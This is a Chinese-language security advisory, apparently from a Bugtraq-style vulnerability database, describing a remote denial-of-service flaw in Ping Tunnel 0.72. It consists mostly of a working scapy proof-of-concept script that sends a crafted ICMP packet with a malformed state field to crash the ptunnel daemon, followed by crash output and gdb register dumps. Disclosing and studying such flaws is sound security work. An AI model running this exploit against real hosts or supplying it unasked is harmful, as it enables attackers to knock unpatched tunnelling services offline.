发布日期:2012-07-20
更新日期:2012-07-25
受影响系统:
freecode Ping Tunnel 0.72
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54627
Ping Tunnel是一个可靠的隧道效应的TCP连接工具,通过ICMP回声请求和应答数据包连接到远程主机,俗称ping请求和回复。
ptunnel 0.72及其他版本在实现上存在远程拒绝服务漏洞,攻击者可利用此漏洞造成受影响应用崩溃。
<*来源:st3n
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
st3n ()提供了如下测试方法:
#===============================================================================
# PoC code (scapy)
#===============================================================================
from scapy.all import *
conf.verbose = 0
# arg ?
if len(sys.argv) < 1:
sys.exit('Usage: %s <host>' % sys.argv[0])
# target
remote_host = sys.argv[1]
# ptunnel.h
#typedef struct {
# uint32_t magic, // magic number, used to identify ptunnel packets.
# dst_ip, // destination IP and port (used by proxy to figure
# dst_port, // out where to tunnel to)
# state, // current connection state; see constants above.
# ack, // sequence number of last packet received from other end
# data_len; // length of data buffer
# uint16_t seq_no, // sequence number of this packet
# id_no; // id number, used to separate different tunnels from each other
# char data[0]; // optional data buffer
#} __attribute__ ((packed)) ping_tunnel_pkt_t;
# build packet
magic='\xd5\x20\x08\x80'
dst_ip='AAAA'
dst_port='BBBB'
state='CCCC' # <===== this trigger the vulnerability
ack='\x00\x00\xff\xff'
data_len='\x00\x00\x00\x00'
seq_id='DDDD'
pkt = IP(dst=remote_host)/ICMP()/Raw(magic)/Raw(dst_ip)/Raw(dst_port)/Raw(state)/Raw(ack)/Raw(data_len)/Raw(seq_id)
# evil evil packet
send(pkt)
#=========================================================================
# Example & Info
#=========================================================================
# Sending evil packet
# -------------------
# $ sudo ./ptunnel-dos.py 127.0.0.1
# .
# Sent 1 packets.
# Daemon side
# -----------
# $ ptunnel -c lo
# [inf]: Starting ptunnel v 0.72.
# [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
# [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
# [inf]: Forwarding incoming ping packets over TCP.
# [inf]: Initializing pcap.
# [inf]: Ping proxy is listening in privileged mode.
# Segmentation fault
# Debug info
# -----------
# Program received signal SIGSEGV, Segmentation fault.
# handle_packet (buf=0x80774a0 "E", bytes=56, is_pcap=1, addr=0xbffff65c, icmp_sock=7) at ptunnel.c:957
# 957 pt_log(kLog_sendrecv, "Recv: %d [%d] bytes [seq = %d] [type = %s] [ack = %d] [icmp = %d] [user = %s] [pcap = %d]\n",
# (gdb)
# (gdb) i r
# eax 0x3434343 54739779
# ecx 0x0 0
# edx 0x3434343 54739779
# ebx 0x8050184 134545796
# esp 0xbffff380 0xbffff380
# ebp 0xbffff468 0xbffff468
# esi 0xffff 65535
# edi 0xbffff5c8 -1073744440
# eip 0x804cdfa 0x804cdfa <handle_packet+494>
# eflags 0x10202 [ IF RF ]
# cs 0x73 115
# ss 0x7b 123
# ds 0x7b 123
# es 0x7b 123
# fs 0x0 0
# gs 0x33 51
# eof
建议:
--------------------------------------------------------------------------------
厂商补丁:
freecode
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: